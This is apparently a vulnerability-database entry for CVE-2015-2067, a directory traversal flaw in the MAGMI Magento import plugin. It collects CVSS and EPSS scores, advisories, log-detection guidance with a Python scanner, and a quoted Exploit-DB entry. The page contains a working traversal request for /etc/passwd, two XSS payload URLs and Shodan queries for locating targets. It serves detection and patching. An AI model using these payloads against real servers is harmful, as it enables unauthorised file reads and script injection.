CVE-2015-2067
Published 2015-02-24
CVE-2015-2067: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read…
Priority P274 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:N/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS
39.42%
98.4th percentile
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dweeves | magmi | 0 – 0.7.21 | — |
Detection & IOCs (extracted from sources)
url: {{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
command: GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
- Detect exploitation attempts by monitoring GET requests to /magmi/web/ajax_pluginconf.php containing directory traversal sequences (../) in the 'file' parameter, particularly targeting /etc/passwd.
- Successful exploitation returns a valid HTTP 200 response with Unix /etc/passwd content matching the pattern 'root:.*:0:0:'.
- The attack uses query parameters plugintype=utilities and pluginclass=CustomSQLUtility alongside the traversal payload; filter for these parameter combinations in web logs.
- Use Shodan queries 'http.component:"Magento"' or 'http.component:"magento"' to identify exposed Magento instances that may be running the vulnerable MAGMI plugin.
- The vulnerability is unauthenticated (Au:N) and network-accessible (AV:N) with low complexity (AC:L), meaning no credentials or special conditions are required to exploit it.
- The EPSS score of 0.76384 (98.9th percentile) indicates this vulnerability has a very high probability of exploitation in the wild; prioritize detection and patching accordingly.
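The web-log check described in the bullets above, as an added example (not code from this page or from the MAGMI project). It assumes Combined Log Format access logs; the sample lines, the result field names and the `classify`/`scan` helpers are constructed for illustration, and it goes slightly beyond the bullets by also unwrapping percent-encoded and double-encoded `..` sequences.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

TARGET = "/magmi/web/ajax_pluginconf.php"
# Combined Log Format: ip - - [time] "METHOD uri PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Constructed sample access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2015:10:00:00 +0000] "GET /magmi/web/ajax_pluginconf.php?file=../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1" 200 1432',
    '198.51.100.7 - - [24/Feb/2015:10:01:00 +0000] "GET /magmi/web/ajax_pluginconf.php?file=%252e%252e%252fetc%252fpasswd&plugintype=utilities&pluginclass=X HTTP/1.1" 404 0',
    '192.0.2.44 - - [24/Feb/2015:10:02:00 +0000] "GET /magmi/web/ajax_pluginconf.php?file=options_panel.php&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1" 200 512',
    '192.0.2.44 - - [24/Feb/2015:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 9000',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double encoding (%252e) is unwrapped."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def traversal_value(values):
    """Return the first decoded value holding a '..' path segment, else None."""
    for raw in values:
        decoded = fully_decode(raw)
        if ".." in re.split(r"[\\/]", decoded):
            return decoded
    return None

def classify(line):
    """Return None for unrelated lines, else a dict describing the attempt."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, uri, status = m.groups()
    parts = urlsplit(uri)
    if not parts.path.lower().endswith(TARGET):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    hit_file = traversal_value(params.get("file", []))
    if hit_file is None:
        return None
    known = (params.get("plugintype") == ["utilities"]
             and params.get("pluginclass") == ["CustomSQLUtility"])
    # served=True (HTTP 200) means the response body needs review.
    return {"ip": ip, "file": hit_file, "known_template": known, "served": status == "200"}

def scan(lines):
    """Classify every log line and keep only the traversal attempts."""
    return [hit for hit in map(classify, lines) if hit]
```

A 200 status only shows the request was served; confirming disclosure still requires the response-body match on 'root:.*:0:0:' from the second bullet.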
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck · 5.0 MEDIUM
OSV
MAGMI plugin for Magento Server Directory Traversal
osv·2022-05-13
CVE-2015-2067 [MEDIUM] MAGMI plugin for Magento Server Directory Traversal
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
GHSA
MAGMI plugin for Magento Server Directory Traversal
ghsa·2022-05-13
CVE-2015-2067 [MEDIUM] CWE-22 MAGMI plugin for Magento Server Directory Traversal
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
VulnCheck
magmi_project magmi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2015·CVSS 5.0
CVE-2015-2067 [MEDIUM] magmi_project magmi Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected: magmi_project magmi
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/
No detection rules found.
Exploit-DB
Magento Server MAGMI Plugin - Multiple Vulnerabilities
exploitdb·2015-02-05
CVE-2015-2068 Magento Server MAGMI Plugin - Multiple Vulnerabilities
---
Exploit Title: Magento Server MAGMI Plugin Local File Inclusion And Cross Site Scripting
Software Link: http://sourceforge.net/projects/magmi/
Author: SECUPENT
Website: www.secupent.com
Email: research{at}secupent{dot}com
Date: 5-2-2015
Exploit(Local file inclusion) :
http://{Server}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility
Screenshot: http://secupent.com/exploit/images/magmilfi.jpg
Exploit(Cross Site Scripting):
1. http://{Server}/magmi/web/magmi.php?configstep=2&profile=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
2. http://{Server}/magmi/web/magmi_import_run.php?%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script
Nuclei
Magento Server MAGMI - Directory Traversal
nuclei·CVSS 5.0
CVE-2015-2067 [MEDIUM] Magento Server MAGMI - Directory Traversal
Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Template:
id: CVE-2015-2067
info:
  name: Magento Server MAGMI - Directory Traversal
  author: daffainfo
  severity: medium
  description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: |
    Apply the latest security patches and updates provided by Magento.
  reference:
    - h
http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
http://www.exploit-db.com/exploits/35996
http://www.securityfocus.com/bid/74881